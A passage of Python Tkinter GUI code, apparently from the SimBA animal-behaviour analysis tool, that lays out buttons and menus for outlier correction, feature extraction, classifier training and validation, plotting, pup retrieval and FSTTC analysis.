button_hmlocation = Button(processmovementdupLabel,text='Create heat maps',command=lambda:self.run_roiAnalysisSettings(Toplevel(),self.hmlvar,'locationheatmap'))
button_timebins_M = Button(processmovementdupLabel,text='Time bins: Distance/velocity',command = lambda: self.timebin_ml("Time bins: Distance/Velocity",))
button_lineplot = Button(processmovementdupLabel, text='Generate path plot', command=self.quicklineplot)
button_analyzeDirection = Button(processmovementdupLabel,text='Analyze directionality between animals',command =lambda:directing_to_other_animals(self.projectconfigini) )
button_visualizeDirection = Button(processmovementdupLabel,text='Visualize directionality between animals',command=lambda:ROI_directionality_other_animals_visualize(self.projectconfigini))
#organize
processmovementdupLabel.grid(row=0,column=4,sticky=N)
button_process_movement1.grid(row=0)
button_hmlocation.grid(row=1)
button_timebins_M.grid(row=2)
button_lineplot.grid(row=3)
button_analyzeDirection.grid(row=4)
button_visualizeDirection.grid(row=5)
#outlier correction
label_outliercorrection = LabelFrame(tab4,text='Outlier correction',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
label_link = Label(label_outliercorrection,text='[link to description]',cursor='hand2',font='Verdana 10 underline')
button_settings_outlier = Button(label_outliercorrection,text='Settings',command = lambda: outlier_settings(self.projectconfigini))
button_outliercorrection = Button(label_outliercorrection,text='Run outlier correction',command=self.correct_outlier)
button_skipOC = Button(label_outliercorrection,text='Skip outlier correction (CAUTION)',fg='red', command=lambda:skip_outlier_c(self.projectconfigini))
label_link.bind("<Button-1>",lambda e: self.callback('https://github.com/sgoldenlab/simba/blob/master/misc/Outlier_settings.pdf'))
#extract features
label_extractfeatures = LabelFrame(tab5,text='Extract Features',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
button_extractfeatures = Button(label_extractfeatures,text='Extract Features',command = lambda: threading.Thread(target=self.extractfeatures).start())
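# helper: enable or disable the widgets passed in *args depending on the checkbox variable (0 = disabled, 1 = normal)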
def activate(box, *args):
for entry in args:
if box.get() == 0:
entry.configure(state='disabled')
elif box.get() == 1:
entry.configure(state='normal')
labelframe_usrdef = LabelFrame(label_extractfeatures)
self.scriptfile = FileSelect(labelframe_usrdef, 'Script path')
self.scriptfile.btnFind.configure(state='disabled')
self.usVar = IntVar()
userscript = Checkbutton(labelframe_usrdef,text='Apply user defined feature extraction script',variable=self.usVar,command=lambda:activate(self.usVar,self.scriptfile.btnFind))
#roiappend
appendDf = Button(label_extractfeatures, text='Append ROI data to features (CAUTION)', fg='red', command=self.appendroisettings)
appendDf.grid(row=10,pady=10)
#label Behavior
label_labelaggression = LabelFrame(tab7,text='Label Behavior',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
button_labelaggression = Button(label_labelaggression, text='Select video (create new video annotation)',command= lambda:choose_folder(self.projectconfigini))
button_load_labelaggression = Button(label_labelaggression,text='Select video (continue existing video annotation)',command= lambda: load_folder(self.projectconfigini))
#third party annotation
label_thirdpartyann = LabelFrame(tab7,text='Import Third-Party behavior labels',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
button_importmars = Button(label_thirdpartyann,text='Import MARS Annotation (select folder with .annot files)',command=self.importMARS)
button_importboris = Button(label_thirdpartyann,text='Import Boris Annotation (select folder with .csv files)',command = self.importBoris)
button_importsolomon = Button(label_thirdpartyann,text='Import Solomon Annotation (select folder with .csv files)',command = self.importSolomon)
#pseudolabel
label_pseudo = LabelFrame(tab7,text='Pseudo Labelling',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
pLabel_framedir = FileSelect(label_pseudo,'Video Path',lblwidth='10')
plabelframe_threshold = LabelFrame(label_pseudo,text='Threshold',pady=5,padx=5)
plabel_threshold =[0]*len(targetlist)
count=0
for i in list(targetlist):
plabel_threshold[count] = Entry_Box(plabelframe_threshold,str(i),'20')
plabel_threshold[count].grid(row=count+2,sticky=W)
count+=1
pLabel_button = Button(label_pseudo,text='Correct label',command = lambda:semisuperviseLabel(self.projectconfigini,pLabel_framedir.file_path,list(targetlist),plabel_threshold))
#train machine model
label_trainmachinemodel = LabelFrame(tab8,text='Train Machine Models',font=("Helvetica",12,'bold'),padx=5,pady=5,fg='black')
button_trainmachinesettings = Button(label_trainmachinemodel,text='Settings',command=self.trainmachinemodelsetting)
button_trainmachinemodel = Button(label_trainmachinemodel,text='Train single model from global environment',fg='blue',command = lambda: threading.Thread(target=trainmodel2, args=(self.projectconfigini,)).start())
button_train_multimodel = Button(label_trainmachinemodel, text='Train multiple models, one for each saved settings',fg='green',command = lambda: threading.Thread(target=self.trainmultimodel).start())
##Single classifier valid
label_model_validation = LabelFrame(tab9, text='Validate Model on Single Video', pady=5, padx=5,
font=("Helvetica", 12, 'bold'), fg='black')
self.csvfile = FileSelect(label_model_validation, 'Select features file',
title='Select .csv file in /project_folder/csv/features_extracted')
self.modelfile = FileSelect(label_model_validation, 'Select model file ', title='Select the model (.sav) file')
button_runvalidmodel = Button(label_model_validation, text='Run Model',command=lambda: validate_model_one_vid_1stStep(self.projectconfigini,self.csvfile.file_path,self.modelfile.file_path))
button_generateplot = Button(label_model_validation, text="Generate plot", command=self.updateThreshold)
self.dis_threshold = Entry_Box(label_model_validation, 'Discrimination threshold', '28')
self.min_behaviorbout = Entry_Box(label_model_validation, 'Minimum behavior bout length (ms)', '28')
self.ganttvar = IntVar()
self.generategantt = Checkbutton(label_model_validation,text='Generate Gantt plot',variable=self.ganttvar)
button_validate_model = Button(label_model_validation, text='Validate', command=self.validatemodelsinglevid)
#run machine model
label_runmachinemodel = LabelFrame(tab9,text='Run Machine Model',font=("Helvetica",12,'bold'),padx=5,pady=5,fg='black')
button_run_rfmodelsettings = Button(label_runmachinemodel,text='Model Settings',command=self.modelselection)
# self.descrimination_threshold = Entry_Box(label_runmachinemodel,'Discrimination threshold','28')
# self.shortest_bout = Entry_Box(label_runmachinemodel,'Minimum behavior bout length (ms)','28')
button_runmachinemodel = Button(label_runmachinemodel,text='Run RF Model',command = self.runrfmodel)
#kleinberg smoothing
kleinberg_button = Button(label_runmachinemodel,text='Kleinberg Smoothing',command = self.kleinbergMenu)
#FSTTC
fsttc_button = Button(label_runmachinemodel,text='FSTTC',command=self.fsttcmenu)
# machine results
label_machineresults = LabelFrame(tab9,text='Analyze Machine Results',font=("Helvetica",12,'bold'),padx=5,pady=5,fg='black')
button_process_datalog = Button(label_machineresults,text='Analyze machine predictions',command =self.analyzedatalog)
button_process_movement = Button(label_machineresults,text='Analyze distances/velocity',command=lambda:self.roi_settings('Analyze distances/velocity',
'processmovement'))
button_movebins = Button(label_machineresults,text='Time bins: Distance/velocity',command=lambda:self.timebinmove('mov'))
button_classifierbins = Button(label_machineresults,text='Time bins: Machine predictions',command=lambda:self.timebinmove('classifier'))
label_severity = LabelFrame(tab9,text='Analyze Severity',font=("Helvetica",12,'bold'),padx=5,pady=5,fg='black')
self.severityscale = Entry_Box(label_severity,'Severity scale 0 -',15)
self.severityTarget = DropDownMenu(label_severity,'Target',targetlist,'15')
self.severityTarget.setChoices(targetlist[(config.get('SML settings', 'target_name_' + str(1)))])
button_process_severity = Button(label_severity,text='Analyze target severity',command=self.analyzseverity)
#plot sklearn res
label_plotsklearnr = LabelFrame(tab10,text='Sklearn visualization',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
#lbl prob threshold
lbl_probthreshold = LabelFrame(label_plotsklearnr,text='Body-part probability threshold',font=("Helvetica",12,'bold'),padx=5,pady=5,fg='black')
lbl_thresexplain = Label(lbl_probthreshold,text='Bodyparts below the set threshold won\'t be shown in the output.')
self.bpthres = Entry_Box(lbl_probthreshold,'Body-part probability threshold','32')
bpthresbutton = Button(lbl_probthreshold,text='Save threshold',command= self.savethres)
#set bp threshold
try:
thres = config.get('threshold_settings', 'bp_threshold_sklearn')
self.bpthres.entry_set(str(thres))
except:
self.bpthres.entry_set(0.0)
#all videos
label_skv_all = LabelFrame(label_plotsklearnr,text='Apply to all videos',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
self.videovar = IntVar()
self.genframevar = IntVar()
videocheck = Checkbutton(label_skv_all,text='Generate video',variable=self.videovar)
framecheck = Checkbutton(label_skv_all,text='Generate frame',variable=self.genframevar)
button_plotsklearnr = Button(label_skv_all,text='Visualize classification results',command =self.plotsklearn_result)
#single video
label_skv_single = LabelFrame(label_plotsklearnr, text='Apply to single video', font=("Helvetica", 12, 'bold'),pady=5, padx=5, fg='black')
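# populate the single-video dropdown with video files found in the project /videos folder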
videodir_ = os.path.join(os.path.dirname(self.projectconfigini), 'videos')
vid_list_ =[]
for i in os.listdir(videodir_):
if i.endswith(('.avi','.mp4','.mov','.flv','.m4v')):
vid_list_.append(i)
if not vid_list_:
vid_list_.append('No videos found')
self.video_entry = DropDownMenu(label_skv_single, 'Select video', vid_list_, '15')
self.video_entry.setChoices(vid_list_[0])
self.videovar2 = IntVar()
self.genframevar2 = IntVar()
videocheck2 = Checkbutton(label_skv_single, text='Generate video', variable=self.videovar2)
framecheck2 = Checkbutton(label_skv_single, text='Generate frame', variable=self.genframevar2)
button_plotsklearnr2 = Button(label_skv_single, text='Visualize classification results',command=lambda: plotsklearnresultsingle(self.projectconfigini,self.videovar2.get(),self.genframevar2.get(),self.video_entry.getChoices()))
#plotpathing
label_plotall = LabelFrame(tab10,text='Visualizations',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
#ganttplot
label_ganttplot = LabelFrame(label_plotall,text='Gantt plot',pady=5,padx=5)
button_ganttplot = Button(label_ganttplot,text='Generate gantt plot',command= lambda: ganntplot_config(self.projectconfigini))
#dataplot
label_dataplot = LabelFrame(label_plotall, text='Data plot', pady=5, padx=5)
if pose_config_setting == 'user_defined':
self.SelectedBp = DropDownMenu(label_dataplot, 'Select body part', bp_set, '15')
self.SelectedBp.setChoices((bp_set)[0])
button_dataplot = Button(label_dataplot, text='Generate data plot', command=self.plotdataplot)
#path plot
label_pathplot = LabelFrame(label_plotall,text='Path plot',pady=5,padx=5)
self.Deque_points = Entry_Box(label_pathplot,'Max lines','15')
self.severity_brackets = Entry_Box(label_pathplot,'Severity Scale: 0 - ','15')
self.noofAnimal = DropDownMenu(label_pathplot,'Number of animals',[1,2],'15')
self.noofAnimal.setChoices(1)
confirmAnimals = Button(label_pathplot,text='Confirm',command=lambda:self.tracknoofanimal(label_pathplot,bp_set))
self.plotsvvar = IntVar()
checkboxplotseverity = Checkbutton(label_pathplot,text='plot_severity',variable=self.plotsvvar)
self.severityTargetpp = DropDownMenu(label_pathplot, 'Target', targetlist, '15')
self.severityTargetpp.setChoices(targetlist[(config.get('SML settings', 'target_name_' + str(1)))])
button_pathplot = Button(label_pathplot,text='Generate Path plot',command=self.pathplotcommand)
CreateToolTip(self.Deque_points,'Maximum number of path lines in deque list')
# CreateToolTip(self.Bodyparts, 'If golden aggression config: Nose, Left ear, Right ear, Centroid, Left lateral, Right lateral, Tail base, Tail end')
CreateToolTip(self.severity_brackets,'Set number of brackets to severity measures')
#distanceplot
label_distanceplot = LabelFrame(label_plotall,text='Distance plot',pady=5,padx=5)
self.poi1 = DropDownMenu(label_distanceplot,'Body part 1',bp_set,'15')
self.poi2 = DropDownMenu(label_distanceplot,'Body part 2',bp_set,'15')
#set choice
self.poi1.setChoices((bp_set)[0])
self.poi2.setChoices((bp_set)[len(bp_set)//2])
button_distanceplot= Button(label_distanceplot,text='Generate Distance plot',command=self.distanceplotcommand)
CreateToolTip(self.poi1,'The bodyparts from config yaml. eg: Ear_left_1,Ear_right_1,Nose_1,Center_1,Lateral_left_1,Lateral_right_1,Tail_base_1,Tail_end_1,Ear_left_2,Ear_right_2,Nose_2,Center_2,Lateral_left_2,Lateral_right_2,Tail_base_2,Tail_end_2')
#Heatplot
label_heatmap = LabelFrame(label_plotall, text='Heatmap', pady=5, padx=5)
self.BinSize = Entry_Box(label_heatmap, 'Bin size (mm)', '15')
self.MaxScale = Entry_Box(label_heatmap, 'max', '15')
hmchoices = ['viridis','plasma','inferno','magma','jet','gnuplot2']
self.hmMenu = DropDownMenu(label_heatmap,'Color Palette',hmchoices,'15')
self.hmMenu.setChoices('jet')
#get target called on top
self.targetMenu = DropDownMenu(label_heatmap,'Target',targetlist,'15')
self.targetMenu.setChoices(targetlist[(config.get('SML settings','target_name_'+str(1)))])
#bodyparts
bpOptionListofList = define_bp_drop_down(configini)
print(bpOptionListofList)
bpoptions = [val for sublist in bpOptionListofList for val in sublist]
self.bp1 = DropDownMenu(label_heatmap,'Bodypart',bpoptions,'15')
self.bp1.setChoices(bpoptions[0])
self.intimgvar = IntVar()
lstimg = Checkbutton(label_heatmap,text='Save last image only (if unticked heatmap videos are created)',variable=self.intimgvar)
button_heatmap = Button(label_heatmap, text='Generate heatmap', command=self.heatmapcommand)
#plot threshold
label_plotThreshold = LabelFrame(label_plotall,text='Plot Threshold',pady=5,padx=5)
self.behaviorMenu = DropDownMenu(label_plotThreshold,'Target',targetlist,'15')
self.behaviorMenu.setChoices(targetlist[(config.get('SML settings','target_name_'+str(1)))])
plotThresholdButton = Button(label_plotThreshold,text='Plot threshold',command=lambda:plot_threshold(self.projectconfigini,self.behaviorMenu.getChoices()))
#Merge frames
label_mergeframes = LabelFrame(tab10, text='Merge frames', pady=5, padx=5, font=("Helvetica", 12, 'bold'), fg='black')
# use for loop to create intvar
mergeFramesvar = []
for i in range(7):
mergeFramesvar.append(IntVar())
# use loop to create checkbox?
mfCheckbox = [0] * 7
mfTitlebox = ['Sklearn', 'Gantt', 'Path', "'Live' data", 'Distance','Probability']
for i in range(6):
mfCheckbox[i] = Checkbutton(label_mergeframes, text=mfTitlebox[i], variable=mergeFramesvar[i])
mfCheckbox[i].grid(row=i, sticky=W)
button_mergeframe = Button(label_mergeframes,text='Merge frames',command= lambda:self.mergeframesofplot(mergeFramesvar))
#Plotly
plotlyInterface = LabelFrame(tab10, text= 'Plotly / Dash', font=("Helvetica", 12, 'bold'), pady=5, padx=5, fg='black')
plotlyInterfaceTitles = ['Sklearn results', 'Time bin analyses', 'Probabilities', 'Severity analysis']
toIncludeVar = []
for i in range(len(plotlyInterfaceTitles)+1):
toIncludeVar.append(IntVar())
plotlyCheckbox = [0] * (len(plotlyInterfaceTitles)+1)
for i in range(len(plotlyInterfaceTitles)):
plotlyCheckbox[i] = Checkbutton(plotlyInterface, text=plotlyInterfaceTitles[i], variable=toIncludeVar[i])
plotlyCheckbox[i].grid(row=i, sticky=W)
button_save_plotly_file = Button(plotlyInterface, text='Save SimBA / Plotly dataset', command=lambda: self.generateSimBPlotlyFile(toIncludeVar))
self.plotly_file = FileSelect(plotlyInterface, 'SimBA Dashboard file (H5)', title='Select SimBA/Plotly dataset (h5)')
self.groups_file = FileSelect(plotlyInterface, 'SimBA Groups file (CSV)', title='Select groups file (csv)')
button_open_plotly_interface = Button(plotlyInterface, text='Open SimBA / Plotly dataset', fg='black', command=lambda: [self.open_plotly_interface('http://127.0.0.1:8050')])
## classifier validation
label_classifier_validation = LabelFrame(tab11, text='Classifier Validation', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
self.seconds = Entry_Box(label_classifier_validation,'Seconds','8')
self.cvTarget = DropDownMenu(label_classifier_validation,'Target',targetlist,'15')
self.cvTarget.setChoices(targetlist[(config.get('SML settings', 'target_name_' + str(1)))])
button_validate_classifier = Button(label_classifier_validation,text='Validate',command =self.classifiervalidation)
# ## Live classification
# label_deeplabstream = LabelFrame(tab12, text='DeepLabStream', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
# self.label_settingsini = FolderSelect(label_deeplabstream, 'Select DLS folder',title='Select DeepLabStream folder')
# button_dlsconfirm = Button(label_deeplabstream,text='Confirm', command = self.DLSsettings)
#addons
lbl_addon = LabelFrame(tab12,text='SimBA Expansions',pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
button_bel = Button(lbl_addon,text='Pup retrieval - Analysis Protocol 1',command = self.pupMenu)
#organize
label_import.grid(row=0,column=0,sticky=W,pady=5)
self.label_import_csv.grid(row=2, sticky=N + W, pady=5)
filetype.grid(row=0,sticky=W)
self.frame.grid(row=3,sticky=W)
label_multicsvimport.grid(row=1, sticky=W)
self.folder_csv.grid(row=0, sticky=W)
button_import_csv.grid(row=1, sticky=W)
label_singlecsvimport.grid(row=2, sticky=W)
self.file_csv.grid(row=0, sticky=W)
button_importsinglecsv.grid(row=1, sticky=W)
label_importvideo.grid(row=0,column=0, sticky=N+W, pady=5,padx=5,rowspan=2)
label_multivideoimport.grid(row=0, sticky=W)
self.multivideofolderpath.grid(row=0, sticky=W)
self.video_type.grid(row=1, sticky=W)
button_multivideoimport.grid(row=2, sticky=W)
label_singlevideoimport.grid(row=1, sticky=W)
self.singlevideopath.grid(row=0, sticky=W)
button_importsinglevideo.grid(row=1, sticky=W)
label_extractframes.grid(row=0,column=1,sticky=N+W,pady=5,padx=5)
button_extractframes.grid(row=0,sticky=W)
label_importframefolder.grid(row=1,column=1,sticky=N+W,pady=5,padx=5,rowspan=2)
self.frame_folder.grid(row=0,sticky=W)
button_importframefolder.grid(row=1,sticky=W)
#
label_reverseID.grid(row=2,column=1,sticky=N+W,pady=5,padx=5)
label_reverse_info.grid(row=0,sticky=W)
label_git_reverse.grid(row=1,sticky=W)
reverse_button.grid(row=2,sticky=W,pady=5)
label_newclassifier.grid(row=0,column=2,sticky=N+W,pady=5,padx=5)
self.classifierentry.grid(row=0,column=0,sticky=W)
button_addclassifier.grid(row=1,column=0,sticky=W)
label_removeclassifier.grid(row=1,column=2,sticky=N+W,pady=5,padx=5)
button_removeclassifier.grid(row=0)
label_archivecsv.grid(row=2,column=2,sticky=W,pady=5,padx=5)
archiveentrybox.grid(row=0)
button_archivecsv.grid(row=1,pady=10)
label_setscale.grid(row=2,sticky=W,pady=5,padx=5)
self.distanceinmm.grid(row=0,column=0,sticky=W)
button_setdistanceinmm.grid(row=0,column=1)
button_setscale.grid(row=1,column=0,sticky=W)
label_outliercorrection.grid(row=0,sticky=W)
label_link.grid(row=0,sticky=W)
button_settings_outlier.grid(row=1,sticky=W)
button_outliercorrection.grid(row=3,sticky=W)
button_skipOC.grid(row=4,sticky=W,pady=5)
label_extractfeatures.grid(row=4,sticky=W)
button_extractfeatures.grid(row=0,sticky=W)
labelframe_usrdef.grid(row=1,sticky=W,pady=5)
userscript.grid(row=1,sticky=W)
self.scriptfile.grid(row=2,sticky=W)
label_labelaggression.grid(row=5,sticky=W)
button_labelaggression.grid(row=0,sticky=W)
button_load_labelaggression.grid(row=1,sticky=W,pady=10)
label_pseudo.grid(row=6,sticky=W,pady=10)
pLabel_framedir.grid(row=0,sticky=W)
plabelframe_threshold.grid(row=2,sticky=W)
pLabel_button.grid(row=3,sticky=W)
label_thirdpartyann.grid(row=7, sticky=W)
button_importmars.grid(row=0, sticky=W)
button_importboris.grid(row=1,sticky=W,pady=10)
button_importsolomon.grid(row=2,sticky=W,pady=2)
label_trainmachinemodel.grid(row=6,sticky=W)
button_trainmachinesettings.grid(row=0,column=0,sticky=W,padx=5)
button_trainmachinemodel.grid(row=0,column=1,sticky=W,padx=5)
button_train_multimodel.grid(row=0,column=2,sticky=W,padx=5)
label_model_validation.grid(row=7, sticky=W, pady=5)
self.csvfile.grid(row=0, sticky=W)
self.modelfile.grid(row=1, sticky=W)
button_runvalidmodel.grid(row=2, sticky=W)
button_generateplot.grid(row=3, sticky=W)
self.dis_threshold.grid(row=4, sticky=W)
self.min_behaviorbout.grid(row=5, sticky=W)
self.generategantt.grid(row=6,sticky=W)
button_validate_model.grid(row=7, sticky=W)
label_runmachinemodel.grid(row=8,sticky=W,pady=5)
button_run_rfmodelsettings.grid(row=0,sticky=W)
# self.descrimination_threshold.grid(row=1,sticky=W)
# button_set_d_t.grid(row=1,column=1,sticky=W)
# self.shortest_bout.grid(row=2,column=0,sticky=W)
# button_set_shortbout.grid(row=2,column=1,sticky=W)
button_runmachinemodel.grid(row=1,sticky=W,pady=5)
kleinberg_button.grid(row=2,sticky=W,pady=10)
fsttc_button.grid(row=3,sticky=W,pady=10)
label_machineresults.grid(row=9,sticky=W,pady=5)
button_process_datalog.grid(row=2,column=0,sticky=W,padx=3)
button_process_movement.grid(row=2,column=1,sticky=W,padx=3)
button_movebins.grid(row=3,column=1,sticky=W,padx=3)
button_classifierbins.grid(row=3,column=0,sticky=W,padx=3)
#severity
label_severity.grid(row=10,sticky=W,pady=5)
self.severityscale.grid(row=0,sticky=W)
self.severityTarget.grid(row=1,sticky=W)
button_process_severity.grid(row=2,sticky=W,pady=8)
label_plotsklearnr.grid(row=11,column=0,sticky=W+N,padx=5)
lbl_probthreshold.grid(row=0,sticky=W,padx=5,pady=10)
lbl_thresexplain.grid(row=0,sticky=W)
self.bpthres.grid(row=1,sticky=E)
bpthresbutton.grid(row=2,padx=5,pady=10)
label_skv_all.grid(row=1,sticky=W,padx=5,pady=10)
videocheck.grid(row=0,sticky=W)
framecheck.grid(row=1,sticky=W)
button_plotsklearnr.grid(row=2,sticky=W)
label_skv_single.grid(row=2,sticky=W,pady=10,padx=5)
self.video_entry.grid(row=0,sticky=W)
videocheck2.grid(row=1,sticky=W)
framecheck2.grid(row=2,sticky=W)
button_plotsklearnr2.grid(row=3,sticky=W)
label_plotall.grid(row=11,column=1,sticky=W+N,padx=5)
#gantt
label_ganttplot.grid(row=0,sticky=W)
button_ganttplot.grid(row=0,sticky=W)
#data
label_dataplot.grid(row=1,sticky=W)
if pose_config_setting == 'user_defined':
self.SelectedBp.grid(row=1, sticky=W)
button_dataplot.grid(row=2, sticky=W)
#path
label_pathplot.grid(row=2,sticky=W)
self.Deque_points.grid(row=0,sticky=W)
self.severity_brackets.grid(row=2,sticky=W)
self.noofAnimal.grid(row=3,sticky=W)
confirmAnimals.grid(row=3,column=1,sticky=W)
checkboxplotseverity.grid(row=7,sticky=W)
self.severityTargetpp.grid(row=8,sticky=W)
button_pathplot.grid(row=9,sticky=W)
#distance
label_distanceplot.grid(row=3,sticky=W)
self.poi1.grid(row=1,sticky=W)
self.poi2.grid(row=2,sticky=W)
button_distanceplot.grid(row=3,sticky=W)
#heat
label_heatmap.grid(row=4, sticky=W)
self.BinSize.grid(row=0, sticky=W)
self.MaxScale.grid(row=1, sticky=W)
self.hmMenu.grid(row=3,sticky=W)
self.targetMenu.grid(row=4,sticky=W)
self.bp1.grid(row=5,sticky=W)
lstimg.grid(row=6,sticky=W)
button_heatmap.grid(row=7, sticky=W)
#threshold
label_plotThreshold.grid(row=5, sticky=W)
self.behaviorMenu.grid(row=0, sticky=W)
plotThresholdButton.grid(row=2, sticky=W)
label_mergeframes.grid(row=11,column=2,sticky=W+N,padx=5)
button_mergeframe.grid(row=10,sticky=W)
plotlyInterface.grid(row=11, column=3, sticky=W + N, padx=5)
button_save_plotly_file.grid(row=10, sticky=W)
self.plotly_file.grid(row=11, sticky=W)
self.groups_file.grid(row=12, sticky=W)
button_open_plotly_interface.grid(row=13, sticky=W)
label_classifier_validation.grid(row=14,sticky=W)
self.seconds.grid(row=0,sticky=W)
self.cvTarget.grid(row=1,sticky=W)
button_validate_classifier.grid(row=2,sticky=W)
lbl_addon.grid(row=15,sticky=W)
button_bel.grid(row=0,sticky=W)
# label_deeplabstream.grid(row=15,sticky=W)
# self.label_settingsini.grid(row=0,sticky=W)
# button_dlsconfirm.grid(row=1,pady=5)
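# swap the two animals' identities in the imported tracking files; only valid for projects with exactly 2 animals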
def reverseid(self):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
noanimal = int(config.get('General settings','animal_no'))
if noanimal ==2:
reverse_dlc_input_files(self.projectconfigini)
else:
print('This only works if you have exactly 2 animals in your tracking data and video.')
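# save the body-part probability threshold for sklearn visualizations to the project config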
def savethres(self):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
config.set('threshold_settings', 'bp_threshold_sklearn',str(self.bpthres.entry_get))
with open(self.projectconfigini, 'w') as configfile:
config.write(configfile)
print('Threshold saved >>', str(self.bpthres.entry_get))
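# pop-up for the pup retrieval (Analysis Protocol 1) add-on; entries are pre-filled with defaults and the animal IDs from the project config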
def pupMenu(self):
#top lvl
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
try:
multi_animal_IDs = config.get('Multi animal IDs', 'id_list').split(',')
except (NoSectionError, NoOptionError):
multi_animal_IDs = ['1_mother', '2_pup']
if len(multi_animal_IDs) != 2:
multi_animal_IDs = ['1_mother', '2_pup']
puptoplvl = Toplevel()
puptoplvl.minsize(400,320)
puptoplvl.wm_title('Pup retrieval - Analysis Protocol 1')
#lblframe for input
lbl_pup = LabelFrame(puptoplvl,text='Pup retrieval - Analysis Protocol 1', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
prob_pup = Entry_Box(lbl_pup,'Tracking probability (pup)','20')
prob_pup.entry_set(0.025)
prob_mom = Entry_Box(lbl_pup,'Tracking probability (dam)','20')
prob_mom.entry_set(0.5)
dist_start = Entry_Box(lbl_pup, 'Start distance criterion (mm)', '20')
dist_start.entry_set(80)
carry_frames_seconds = Entry_Box(lbl_pup, 'Carry frames (s)', '20')
carry_frames_seconds.entry_set(3)
corenest_name = Entry_Box(lbl_pup, 'Core-nest name', '20')
corenest_name.entry_set('corenest')
nest_name = Entry_Box(lbl_pup, 'Nest name', '20')
nest_name.entry_set('nest')
dam_name = Entry_Box(lbl_pup, 'Dam name', '20')
dam_name.entry_set(multi_animal_IDs[0])
pup_name = Entry_Box(lbl_pup, 'Pup name', '20')
pup_name.entry_set(multi_animal_IDs[1])
smooth_function = Entry_Box(lbl_pup, 'Smooth function', '20')
smooth_function.entry_set('gaussian')
smooth_factor = Entry_Box(lbl_pup, 'Smooth factor', '20')
smooth_factor.entry_set(5)
max_time = Entry_Box(lbl_pup, 'Max time (s)', '20')
max_time.entry_set(90)
carry_classifier_name = Entry_Box(lbl_pup, 'Carry classifier name', '20')
carry_classifier_name.entry_set('carry')
approach_classifier_name = Entry_Box(lbl_pup, 'Approach classifier name', '20')
approach_classifier_name.entry_set('approach')
dig_classifier_name = Entry_Box(lbl_pup, 'Dig classifier name', '20')
dig_classifier_name.entry_set('doggy')
#button
button_run = Button(puptoplvl,text='RUN',font=("Helvetica",12,'bold'),fg='red',command= lambda: pup_retrieval_1(self.projectconfigini, float(prob_pup.entry_get), float(prob_mom.entry_get), float(dist_start.entry_get), float(carry_frames_seconds.entry_get), float(smooth_factor.entry_get), corenest_name.entry_get, nest_name.entry_get, dam_name.entry_get, pup_name.entry_get, smooth_function.entry_get, int(max_time.entry_get), carry_classifier_name.entry_get, approach_classifier_name.entry_get, dig_classifier_name.entry_get))
#organize
lbl_pup.grid(row=0,sticky=W)
prob_pup.grid(row=0,sticky=W)
prob_mom.grid(row=1,sticky=W)
dist_start.grid(row=2,sticky=W)
carry_frames_seconds.grid(row=4,sticky=W)
corenest_name.grid(row=5,sticky=W)
nest_name.grid(row=6,sticky=W)
dam_name.grid(row=7,sticky=W)
pup_name.grid(row=8,sticky=W)
smooth_function.grid(row=9, sticky=W)
smooth_factor.grid(row=10, sticky=W)
max_time.grid(row=11, sticky=W)
carry_classifier_name.grid(row=12,sticky=W)
approach_classifier_name.grid(row=13,sticky=W)
dig_classifier_name.grid(row=14, sticky=W)
button_run.grid(row=1,padx=10,pady=10)
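# pop-up for calculating forward spike-time tiling coefficients (FSTTC) between the selected classifiers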
def fsttcmenu(self):
#get data
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# get current no of target
notarget = config.getint('SML settings', 'no_targets')
targetlist = [0] * notarget
varlist = [0] * notarget
for i in range(notarget):
varlist[i] = IntVar()
targetlist[i] = (config.get('SML settings', 'target_name_' + str(i + 1)))
#toplvl
fstoplvl = Toplevel()
fstoplvl.minsize(400,320)
fstoplvl.wm_title('Calculate forward spike-time tiling coefficients')
#git
lbl_git_fsttc = Label(fstoplvl, text='[Click here to learn about FSTTC]',cursor='hand2', fg='blue')
lbl_git_fsttc.bind('<Button-1>', lambda e: webbrowser.open_new('https://github.com/sgoldenlab/simba/blob/master/docs/FSTTC.md'))
#fsttc settings
lbl_fsttc_settings = LabelFrame(fstoplvl,text='FSTTC Settings', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
cvar = IntVar()
cr8_graph = Checkbutton(lbl_fsttc_settings,text='Create graph',variable=cvar)
time_delta = Entry_Box(lbl_fsttc_settings,'Time Delta','10')
lbl_behavior = LabelFrame(lbl_fsttc_settings,text="Behaviors")
#behaviors
behaviorlist = [0]*notarget
for i in range(len(targetlist)):
behaviorlist[i] = Checkbutton(lbl_behavior,text=str(targetlist[i]),variable=varlist[i])
behaviorlist[i].grid(row=str(i),sticky=W)
ftsccbutton = Button(fstoplvl,text='Calculate FSTTC',command=lambda:self.runfsttc(time_delta.entry_get,cvar.get(),targetlist,varlist))
#organize
lbl_git_fsttc.grid(row=0,sticky=W,pady=5)
lbl_fsttc_settings.grid(row=1,sticky=W)
cr8_graph.grid(row=0,sticky=W)
time_delta.grid(row=1,sticky=W,pady=5)
lbl_behavior.grid(row=2,sticky=W,pady=5)
ftsccbutton.grid(row=3,pady=10)
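# run the FSTTC pipeline (sequence data, coefficients, save, plot) for the classifiers ticked in the menu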
def runfsttc(self,timedelta,creategraph,targetlist,varlist):
if creategraph == 1:
creategraph = True
else:
creategraph = False
target = []
for i in range(len(varlist)):
if varlist[i].get()==1:
target.append(targetlist[i])
FSTCC_performer = FSTCC_perform(self.projectconfigini, timedelta, target, creategraph)
FSTCC_performer.calculate_sequence_data()
FSTCC_performer.calculate_FSTCC()
FSTCC_performer.save_results()
FSTCC_performer.plot_results()
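# pop-up for the Kleinberg smoother settings (sigma, gamma, hierarchy) and classifier selection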
def kleinbergMenu(self):
kleintoplvl = Toplevel()
kleintoplvl.minsize(400,320)
